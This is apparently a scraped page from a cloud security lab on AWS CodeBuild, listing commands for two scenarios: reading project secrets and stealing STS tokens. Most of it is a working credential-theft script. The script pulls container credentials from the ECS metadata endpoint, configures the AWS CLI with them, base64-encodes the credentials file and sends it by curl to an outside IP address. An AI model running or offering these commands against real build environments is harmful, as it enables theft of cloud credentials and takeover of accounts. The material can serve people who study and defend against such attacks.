Cloudbuild - Security
Security
Senario I - Secrets
aws codebuild batch-get-projects --names securitylabs-articles --region us-east-2
Senario II - Stealing STS Tokens


Last updated
aws codebuild batch-get-projects --names securitylabs-articles --region us-east-2


Last updated
curl -qL -o aws_credentials.json http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI > aws_credentials.json
aws configure set region 'ap-south-1'
aws configure set aws_access_key_id `jq -r '.AccessKeyId' aws_credentials.json`
aws configure set aws_secret_access_key `jq -r '.SecretAccessKey' aws_credentials.json`
aws configure set aws_session_token `jq -r '.Token' aws_credentials.json`
encoded=$(cat ~/.aws/credentials | base64 -w 0)
curl "http://18.189.180.144:8000/&stuff=$encoded"